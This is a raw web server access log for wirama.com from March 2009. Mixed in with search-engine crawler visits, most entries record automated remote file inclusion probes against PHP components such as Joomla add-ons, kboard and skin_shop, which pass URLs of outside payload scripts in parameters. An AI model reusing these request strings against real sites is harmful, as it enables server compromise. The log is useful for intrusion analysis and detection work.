65.55.208.59 - - [28/Mar/2009:17:45:38 -0700] "GET /logs/?D=D HTTP/1.1" 200 1237 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.198.21.196 - - [28/Mar/2009:18:04:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://injekan.50g.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
88.198.21.196 - - [28/Mar/2009:18:04:26 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://injekan.50g.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
88.198.21.196 - - [28/Mar/2009:18:04:26 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://injekan.50g.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.235.124.104 - - [28/Mar/2009:18:43:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
66.235.124.104 - - [28/Mar/2009:18:43:27 -0700] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
208.80.195.47 - - [28/Mar/2009:19:02:04 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; QS 4.2.1.0; InfoPath.1)" "wirama.com"
77.221.130.17 - - [28/Mar/2009:19:11:22 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.17 - - [28/Mar/2009:19:11:22 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.18 - - [28/Mar/2009:19:29:23 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.18 - - [28/Mar/2009:19:29:23 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.22 - - [28/Mar/2009:19:29:43 -0700] "GET /twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
77.221.130.22 - - [28/Mar/2009:19:29:43 -0700] "GET /logs//twindow_notice.php?shop_this_skin_path=http://anggey.selfip.com/har/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.104.10 - - [28/Mar/2009:20:02:22 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.104.10 - - [28/Mar/2009:20:02:22 -0700] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
64.33.49.212 - - [28/Mar/2009:20:20:19 -0700] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bobboast.com/dodge/upload/data/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.33.49.212 - - [28/Mar/2009:20:20:19 -0700] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bobboast.com/dodge/upload/data/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.33.49.212 - - [28/Mar/2009:20:20:19 -0700] "GET /logs/access.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.bobboast.com/dodge/upload/data/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.18.148.82 - - [28/Mar/2009:20:41:28 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
72.18.148.82 - - [28/Mar/2009:20:41:28 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
72.18.148.82 - - [28/Mar/2009:20:41:45 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
72.18.148.82 - - [28/Mar/2009:20:41:45 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "wirama.com"
217.172.179.213 - - [28/Mar/2009:20:42:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.badescoo.web.aplus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "wirama.com"
217.172.179.213 - - [28/Mar/2009:20:42:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.badescoo.web.aplus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "wirama.com"
91.121.208.58 - - [28/Mar/2009:20:43:46 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
91.121.208.58 - - [28/Mar/2009:20:43:46 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://pjluther.net/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
217.172.179.213 - - [28/Mar/2009:20:51:53 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.badescoo.web.aplus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "wirama.com"
217.172.179.213 - - [28/Mar/2009:20:51:53 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.badescoo.web.aplus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "wirama.com"
65.55.104.10 - - [28/Mar/2009:21:30:08 -0700] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
69.64.34.249 - - [28/Mar/2009:21:42:44 -0700] "GET //vwar/backup/errors.php?error=http://www.ceebibi.com/bbs/data/zerobyte/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.64.34.249 - - [28/Mar/2009:21:42:44 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.ceebibi.com/bbs/data/zerobyte/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
69.64.34.249 - - [28/Mar/2009:21:42:44 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.ceebibi.com/bbs/data/zerobyte/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
74.6.22.101 - - [28/Mar/2009:21:46:48 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:36:29 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:36:29 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:36:29 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:41:14 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:52:03 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:52:03 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
209.172.33.230 - - [28/Mar/2009:22:52:03 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
65.55.208.47 - - [28/Mar/2009:23:05:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [28/Mar/2009:23:05:40 -0700] "GET /logs/?N=A HTTP/1.1" 200 1373 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
121.254.156.198 - - [28/Mar/2009:23:07:23 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.254.156.198 - - [28/Mar/2009:23:07:23 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.254.156.198 - - [28/Mar/2009:23:07:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [28/Mar/2009:23:11:09 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [28/Mar/2009:23:11:09 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [28/Mar/2009:23:11:09 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:19:07 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:19:07 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:19:09 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cap.org.hk/phpATM/cfg/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:23:48 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:23:48 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:23:50 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:24:07 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:24:09 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [28/Mar/2009:23:24:11 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
213.239.202.227 - - [28/Mar/2009:23:36:58 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
213.239.202.227 - - [28/Mar/2009:23:36:59 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
74.6.22.101 - - [28/Mar/2009:23:43:25 -0700] "GET /logs/access_090201.log HTTP/1.0" 200 475690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
93.93.112.74 - - [28/Mar/2009:23:44:01 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
93.93.112.74 - - [28/Mar/2009:23:44:02 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
213.239.202.227 - - [28/Mar/2009:23:46:02 -0700] "GET /logs//?view=page&pagename=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 1378 "-" "libwww-perl/5.805" "wirama.com"
213.239.202.227 - - [28/Mar/2009:23:46:02 -0700] "GET /?view=page&pagename=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "wirama.com"
217.75.209.39 - - [28/Mar/2009:23:52:30 -0700] "GET /logs/access.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anggey.selfip.com/har/myid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.75.209.39 - - [28/Mar/2009:23:52:30 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anggey.selfip.com/har/myid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.75.209.39 - - [28/Mar/2009:23:52:30 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anggey.selfip.com/har/myid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.93.112.74 - - [28/Mar/2009:23:52:54 -0700] "GET /logs//?view=page&pagename=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 1378 "-" "libwww-perl/5.812" "wirama.com"
93.93.112.74 - - [28/Mar/2009:23:52:55 -0700] "GET /?view=page&pagename=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 200 916 "-" "libwww-perl/5.812" "wirama.com"
121.254.156.198 - - [29/Mar/2009:00:00:07 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.254.156.198 - - [29/Mar/2009:00:00:08 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
121.254.156.198 - - [29/Mar/2009:00:00:08 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [29/Mar/2009:00:08:12 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [29/Mar/2009:00:08:13 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
117.110.220.66 - - [29/Mar/2009:00:08:13 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:00:10:10 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:00:10:10 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:00:10:10 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
118.45.190.171 - - [29/Mar/2009:00:12:26 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://gotomlb.org/zip/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.45.190.171 - - [29/Mar/2009:00:12:26 -0700] "GET /logs/access.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://gotomlb.org/zip/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.45.190.171 - - [29/Mar/2009:00:12:26 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://gotomlb.org/zip/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:39 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:39 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:41 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:46 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:46 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:12:48 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
94.23.6.5 - - [29/Mar/2009:00:15:08 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
94.23.6.5 - - [29/Mar/2009:00:15:08 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cap.org.hk/phpATM/cfg/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.208.48 - - [29/Mar/2009:00:26:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [29/Mar/2009:00:26:48 -0700] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
58.227.193.198 - - [29/Mar/2009:00:31:07 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:00:31:07 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
58.227.193.198 - - [29/Mar/2009:00:31:07 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
139.11.11.112 - - [29/Mar/2009:00:32:29 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
139.11.11.112 - - [29/Mar/2009:00:32:29 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
139.11.11.112 - - [29/Mar/2009:00:32:41 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
139.11.11.112 - - [29/Mar/2009:00:32:43 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://unlockedphones.eu/antivirus/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
211.233.62.115 - - [29/Mar/2009:00:32:55 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
211.233.62.115 - - [29/Mar/2009:00:32:55 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
211.233.62.115 - - [29/Mar/2009:00:32:55 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//components/com_joomlalib/internal/registration.html/id2.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.wirama.com"
206.220.64.3 - - [29/Mar/2009:00:34:17 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
206.220.64.3 - - [29/Mar/2009:00:34:17 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://alandar.net/www2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [29/Mar/2009:00:36:52 -0700] "GET /logs/access_090301.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
148.245.102.115 - - [29/Mar/2009:00:36:52 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
148.245.102.115 - - [29/Mar/2009:00:36:52 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "wirama.com"
148.245.102.115 - - [29/Mar/2009:00:40:11 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
148.245.102.115 - - [29/Mar/2009:00:40:11 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://betterchoice.secureserver101.com//assets/export/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
120.28.64.69 - - [29/Mar/2009:00:56:36 -0700] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
74.6.22.101 - - [29/Mar/2009:01:03:37 -0700] "GET /jo03.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
